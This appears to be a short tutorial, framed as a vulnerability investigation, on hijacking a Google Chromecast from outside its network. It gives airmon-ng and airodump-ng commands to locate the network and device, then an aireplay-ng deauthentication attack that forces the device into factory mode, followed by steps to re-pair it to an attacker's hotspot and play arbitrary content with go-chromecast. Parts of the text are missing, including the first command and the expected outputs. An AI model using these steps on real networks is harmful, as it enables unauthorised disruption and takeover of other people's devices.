Vulnerability Investigation by
Martin Markov
How could the Google Chromecast be hijacked and tricked to play anything by someone outside the network it is connected to?
Google Home
Cast
Requirements:
A Chromecast connected to a protected network
One wireless network adaptor that supports monitoring mode
Another wireless network adaptor that could create a hotspot
A smart mobile device with the Google Home app installed
а) First, check the available wireless network interfaces with the following command:
b) Select one of the interfaces and put it into monitoring mode by executing the following command:
sudo airmon-ng start wlp3s0c) Search for nearby access points via the monitoring interface by executing this command:
sudo airodump-ng wlp3s0monAs a result, the BSSID (MAC address) of the target (and all available) networks should be shown as well as the network channel:
d) The next step would be to scan the devices connected to this network via this command:
sudo airodump-ng wlp3s0mon --bssid E8:DE:27:47:0D:F8 --channel 11This should produce an output like this:
e) Go to https://www.draytek.co.uk/support/guides/identifying-a-product-vendor-by-mac-address to identify which is Chromecast's MAC Address
f) Launch the deauth attack for the Chromecast device only
aireplay-ng --deauth 0 -c B0:E4:D5:B8:DE:57 -a E8:DE:27:47:0D:F8 wlp3s0monThe arguments represent the following:
2. Once the Chromecast has entered its factory mode, connect to it by connecting your phone to the open Chromecast network
3. Set up a WiFi Hotspot
4. Configure the Chromecast with the Hotspot through Google Home
5. Use go-chromecast to play whatever you want on the Chromecast